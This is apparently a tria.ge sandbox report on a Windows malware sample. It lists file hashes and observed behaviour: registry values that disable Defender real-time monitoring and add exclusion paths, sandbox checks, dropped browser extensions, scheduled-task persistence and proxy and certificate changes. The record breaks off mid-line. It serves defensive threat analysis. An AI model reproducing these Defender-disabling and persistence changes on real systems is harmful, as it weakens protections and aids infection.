Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
121s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20231020-en -
resource tags
arch:x64arch:x86image:win7-20231020-enlocale:en-usos:windows7-x64system -
submitted
25/11/2023, 18:38
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20231020-en
General
-
Target
file.exe
-
Size
7.2MB
-
MD5
13c54df3790dbde46fbe989793e21ce7
-
SHA1
ed331ca706aa52e6ddee7af22da490cc001749bc
-
SHA256
2cc26a714371577628a15d4b25ea23af43995d7d20b2a3fd891db403915e5e69
-
SHA512
e4904f745e3c06c834fcb98014fcb3054721a30b2d246047c0b4db1108cb58bb873cf398ab14a4777d2c69037b676238c7aa2f0660c6459dcfef6ad7f3f1c8c3
-
SSDEEP
196608:91OMVkbPbPFUEBQXzM14+H22JZu9c7eSL2r5bbk:3OMV0jPOECDMK+W2TXLO5k
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\jxiGQpNjugTNMjfxWSR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\tZRuTBnWsrIvjiMS = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\tZRuTBnWsrIvjiMS = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\jxiGQpNjugTNMjfxWSR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\sExqNpidIxpuC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\XfLIShEvOXUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\bNpaxMIFBfOU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\rXjduNqsU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\UcpCEAFeKxUwNazky = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\tZRuTBnWsrIvjiMS = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\XfLIShEvOXUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\bNpaxMIFBfOU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\mIZkPWOoOJyyBkVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\UcpCEAFeKxUwNazky = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\tZRuTBnWsrIvjiMS = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\rXjduNqsU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\sExqNpidIxpuC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\mIZkPWOoOJyyBkVB = "0" reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 24 2012 rundll32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Control Panel\International\Geo\Nation yNgrYVo.exe -
Executes dropped EXE 4 IoCs
pid Process 2632 Install.exe 2232 Install.exe 1712 VUHPWtm.exe 1928 yNgrYVo.exe -
Loads dropped DLL 12 IoCs
pid Process 2468 file.exe 2632 Install.exe 2632 Install.exe 2632 Install.exe 2632 Install.exe 2232 Install.exe 2232 Install.exe 2232 Install.exe 2012 rundll32.exe 2012 rundll32.exe 2012 rundll32.exe 2012 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json yNgrYVo.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json yNgrYVo.exe -
Drops file in System32 directory 21 IoCs
description ioc Process File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol VUHPWtm.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat yNgrYVo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA yNgrYVo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_5B1817C873771E7928FB0BB0A329932B yNgrYVo.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_FB07F06F91B9FC3861EF6AA1C17C17C7 yNgrYVo.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol yNgrYVo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_5B1817C873771E7928FB0BB0A329932B yNgrYVo.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA yNgrYVo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA yNgrYVo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_FB07F06F91B9FC3861EF6AA1C17C17C7 yNgrYVo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_8FF5BE4204C5F704E3914BEF4952C317 yNgrYVo.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol VUHPWtm.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini VUHPWtm.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA yNgrYVo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_8FF5BE4204C5F704E3914BEF4952C317 yNgrYVo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File created C:\Program Files (x86)\sExqNpidIxpuC\xwhNbHR.dll yNgrYVo.exe File created C:\Program Files (x86)\sExqNpidIxpuC\mShNRbs.xml yNgrYVo.exe File created C:\Program Files (x86)\bNpaxMIFBfOU2\jFQhRMSRjzDSn.dll yNgrYVo.exe File created C:\Program Files (x86)\bNpaxMIFBfOU2\zTkcCtK.xml yNgrYVo.exe File created C:\Program Files (x86)\jxiGQpNjugTNMjfxWSR\xyGwHVv.dll yNgrYVo.exe File created C:\Program Files (x86)\jxiGQpNjugTNMjfxWSR\JYSyzHW.xml yNgrYVo.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi yNgrYVo.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi yNgrYVo.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak yNgrYVo.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja yNgrYVo.exe File created C:\Program Files (x86)\rXjduNqsU\YRmTlyd.xml yNgrYVo.exe File created C:\Program Files (x86)\rXjduNqsU\FhMRzS.dll yNgrYVo.exe File created C:\Program Files (x86)\XfLIShEvOXUn\tfjJKET.dll yNgrYVo.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bbPqNtaaeFeEtSKaKR.job schtasks.exe File created C:\Windows\Tasks\GVFFxSkoOBQmaesjx.job schtasks.exe File created C:\Windows\Tasks\ydgLTpiJkJvZaMG.job schtasks.exe File created C:\Windows\Tasks\jFAecgscnrJhBwrRF.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1744 schtasks.exe 936 schtasks.exe 1908 schtasks.exe 964 schtasks.exe 276 schtasks.exe 2680 schtasks.exe 2368 schtasks.exe 2548 schtasks.exe 2484 schtasks.exe 3012 schtasks.exe 3056 schtasks.exe 2160 schtasks.exe 3068 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates yNgrYVo.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\Software wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8a-b2-3d-14-6d-97\WpadDecisionTime = 00a76dcbce1fda01 yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs yNgrYVo.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" yNgrYVo.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8a-b2-3d-14-6d-97\WpadDecisionReason = "1" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings yNgrYVo.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad yNgrYVo.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9977155F-6871-4D0E-901D-FB9D7A679303}\WpadDecisionTime = 00a76dcbce1fda01 yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8a-b2-3d-14-6d-97 yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9977155F-6871-4D0E-901D-FB9D7A679303}\8a-b2-3d-14-6d-97 yNgrYVo.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root yNgrYVo.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9977155F-6871-4D0E-901D-FB9D7A679303} yNgrYVo.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9977155F-6871-4D0E-901D-FB9D7A679303}\WpadDecision = "0" yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9977155F-6871-4D0E-901D-FB9D7A679303}\8a-b2-3d-14-6d-97 rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f007c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 yNgrYVo.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8a-b2-3d-14-6d-97 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9977155F-6871-4D0E-901D-FB9D7A679303}\WpadNetworkName = "Network 2" yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates yNgrYVo.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8a-b2-3d-14-6d-97\WpadDetectedUrl rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs yNgrYVo.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8a-b2-3d-14-6d-97\WpadDecisionTime = 00a76dcbce1fda01 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9977155F-6871-4D0E-901D-FB9D7A679303}\WpadDecisionReason = "1" yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs yNgrYVo.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs yNgrYVo.exe -
Suspicious behavior: EnumeratesProcesses 29 IoCs
pid Process 268 powershell.EXE 268 powershell.EXE 268 powershell.EXE 1992 powershell.EXE 1992 powershell.EXE 1992 powershell.EXE 3032 powershell.EXE 3032 powershell.EXE 3032 powershell.EXE 1648 powershell.EXE 1648 powershell.EXE 1648 powershell.EXE 1928 yNgrYVo.exe 1928 yNgrYVo.exe 1928 yNgrYVo.exe 1928 yNgrYVo.exe 1928 yNgrYVo.exe 1928 yNgrYVo.exe 1928 yNgrYVo.exe 1928 yNgrYVo.exe 1928 yNgrYVo.exe 1928 yNgrYVo.exe 1928 yNgrYVo.exe 1928 yNgrYVo.exe 1928 yNgrYVo.exe 1928 yNgrYVo.exe 1928 yNgrYVo.exe 1928 yNgrYVo.exe 1928 yNgrYVo.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 268 powershell.EXE Token: SeDebugPrivilege 1992 powershell.EXE Token: SeDebugPrivilege 3032 powershell.EXE Token: SeDebugPrivilege 1648 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2468 wrote to memory of 2632 2468 file.exe 28 PID 2468 wrote to memory of 2632 2468 file.exe 28 PID 2468 wrote to memory of 2632 2468 file.exe 28 PID 2468 wrote to memory of 2632 2468 file.exe 28 PID 2468 wrote to memory of 2632 2468 file.exe 28 PID 2468 wrote to memory of 2632 2468 file.exe 28 PID 2468 wrote to memory of 2632 2468 file.exe 28 PID 2632 wrote to memory of 2232 2632 Install.exe 29 PID 2632 wrote to memory of 2232 2632 Install.exe 29 PID 2632 wrote to memory of 2232 2632 Install.exe 29 PID 2632 wrote to memory of 2232 2632 Install.exe 29 PID 2632 wrote to memory of 2232 2632 Install.exe 29 PID 2632 wrote to memory of 2232 2632 Install.exe 29 PID 2632 wrote to memory of 2232 2632 Install.exe 29 PID 2232 wrote to memory of 2584 2232 Install.exe 31 PID 2232 wrote to memory of 2584 2232 Install.exe 31 PID 2232 wrote to memory of 2584 2232 Install.exe 31 PID 2232 wrote to memory of 2584 2232 Install.exe 31 PID 2232 wrote to memory of 2584 2232 Install.exe 31 PID 2232 wrote to memory of 2584 2232 Install.exe 31 PID 2232 wrote to memory of 2584 2232 Install.exe 31 PID 2232 wrote to memory of 2720 2232 Install.exe 33 PID 2232 wrote to memory of 2720 2232 Install.exe 33 PID 2232 wrote to memory of 2720 2232 Install.exe 33 PID 2232 wrote to memory of 2720 2232 Install.exe 33 PID 2232 wrote to memory of 2720 2232 Install.exe 33 PID 2232 wrote to memory of 2720 2232 Install.exe 33 PID 2232 wrote to memory of 2720 2232 Install.exe 33 PID 2584 wrote to memory of 2216 2584 forfiles.exe 35 PID 2584 wrote to memory of 2216 2584 forfiles.exe 35 PID 2584 wrote to memory of 2216 2584 forfiles.exe 35 PID 2584 wrote to memory of 2216 2584 forfiles.exe 35 PID 2584 wrote to memory of 2216 2584 forfiles.exe 35 PID 2584 wrote to memory of 2216 2584 forfiles.exe 35 PID 2584 wrote to memory of 2216 2584 forfiles.exe 35 PID 2720 wrote to memory of 2548 2720 forfiles.exe 36 PID 2720 wrote to memory of 2548 2720 forfiles.exe 36 PID 2720 wrote to memory of 2548 2720 forfiles.exe 36 PID 2720 wrote to memory of 2548 2720 forfiles.exe 36 PID 2720 wrote to memory of 2548 2720 forfiles.exe 36 PID 2720 wrote to memory of 2548 2720 forfiles.exe 36 PID 2720 wrote to memory of 2548 2720 forfiles.exe 36 PID 2216 wrote to memory of 2544 2216 cmd.exe 37 PID 2216 wrote to memory of 2544 2216 cmd.exe 37 PID 2216 wrote to memory of 2544 2216 cmd.exe 37 PID 2216 wrote to memory of 2544 2216 cmd.exe 37 PID 2216 wrote to memory of 2544 2216 cmd.exe 37 PID 2216 wrote to memory of 2544 2216 cmd.exe 37 PID 2216 wrote to memory of 2544 2216 cmd.exe 37 PID 2548 wrote to memory of 2568 2548 cmd.exe 38 PID 2548 wrote to memory of 2568 2548 cmd.exe 38 PID 2548 wrote to memory of 2568 2548 cmd.exe 38 PID 2548 wrote to memory of 2568 2548 cmd.exe 38 PID 2548 wrote to memory of 2568 2548 cmd.exe 38 PID 2548 wrote to memory of 2568 2548 cmd.exe 38 PID 2548 wrote to memory of 2568 2548 cmd.exe 38 PID 2216 wrote to memory of 2600 2216 cmd.exe 39 PID 2216 wrote to memory of 2600 2216 cmd.exe 39 PID 2216 wrote to memory of 2600 2216 cmd.exe 39 PID 2216 wrote to memory of 2600 2216 cmd.exe 39 PID 2216 wrote to memory of 2600 2216 cmd.exe 39 PID 2216 wrote to memory of 2600 2216 cmd.exe 39 PID 2216 wrote to memory of 2600 2216 cmd.exe 39 PID 2548 